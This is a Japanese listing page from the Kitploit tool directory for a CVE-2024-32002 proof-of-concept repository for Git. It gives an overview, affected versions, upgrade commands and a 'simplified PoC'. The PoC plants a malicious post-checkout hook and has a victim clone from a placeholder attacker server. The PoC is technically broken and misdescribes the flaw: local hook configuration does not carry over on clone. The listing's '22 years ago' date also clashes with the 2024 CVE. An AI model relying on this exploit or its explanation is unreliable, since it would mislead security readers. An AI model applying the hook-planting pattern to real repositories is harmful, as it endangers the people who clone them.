Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-32002-PoC_Chinese — なし | Kitploit
ツール/GitHubGitHub/basyacatx/cve-2024-32002-poc_chinese
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHubbasyacatx/cve-2024-32002-poc_chinese

CVE-2024-32002-PoC_Chinese

なし

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-32002 脆弱性概要(⚠️注意!:このリポジトリをクローンしないでください!!!⚠️)

説明

CVE-2024-32002は、Gitソフトウェアで発見された深刻なセキュリティ脆弱性です。この脆弱性により、リモートの攻撃者は特別に細工されたGitリポジトリを介して、影響を受けるシステム上で任意のコードを実行できます。この脆弱性は、Gitが特定のリポジトリ操作を処理する際に存在し、入力データの十分な検証が欠如しているため、リモートコード実行(RCE)のリスクが生じます。

影響

この脆弱性が悪用されると、以下が発生する可能性があります:

  • リモートコード実行(RCE):攻撃者は影響を受けるシステム上で任意のコードを実行できます。
  • システム制御:攻撃者は影響を受けるシステムの完全な制御を獲得する可能性があります。
  • データ漏洩と改ざん:機密データへの不正アクセスおよび変更。
  • さらなる攻撃:被害者のネットワーク内でさらに攻撃を仕掛ける。

影響を受けるバージョン

以下のGitソフトウェアのバージョンがCVE-2024-32002の影響を受けます: Versions Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4

脆弱性の詳細

CVE-2024-32002 の詳細 脆弱性は、Gitが特定のリポジトリ操作を処理する際に存在します。ユーザーが悪意のあるGitリポジトリをクローンしたり、それとやり取りしたりすると、攻撃者は特別に細工されたリポジトリやコミット履歴を介して悪意のあるコードを注入できます。十分な入力検証が欠如しているため、これらの悪意のあるコードはリポジトリ操作の実行時にセキュリティチェックをバイパスし、任意のコード実行を引き起こします。

攻撃ベクトル

  1. 悪意のあるリポジトリ:攻撃者は、特別に細工されたコミット履歴やファイルを含む悪意のあるGitリポジトリを作成します。
  2. ソーシャルエンジニアリング:攻撃者は被害者を誘導して、悪意のあるリポジトリをクローンしたり、それとやり取りさせます。
  3. コード実行:被害者が特定のGit操作(git clone、git pullなど)を実行すると、悪意のあるコードがトリガーされて実行されます。

緩和策

アップグレード

ユーザーは、この脆弱性の修正が含まれる最新バージョンのGitソフトウェアにアップグレードすることを強く推奨します。修正バージョンは以下のとおりです:

  • Git 2.45.1 以降

アップグレードコマンドは以下のとおりです:

root@kitploit:~
# 对于 macOS
brew upgrade git

# 对于 Ubuntu/Debian
sudo apt-get update
sudo apt-get install git

# 对于 CentOS/RHEL
sudo yum update git

悪用方法

CVE-2024-32002の概念実証(PoC)が公開されています。以下は簡略化されたPoCの例です:

root@kitploit:~
# 攻击者创建恶意仓库
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"

# 通过注入恶意代码的提交历史触发漏洞
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"

# 受害者克隆恶意仓库时触发漏洞
git clone attacker_server/malicious-repo
ツールをダウンロード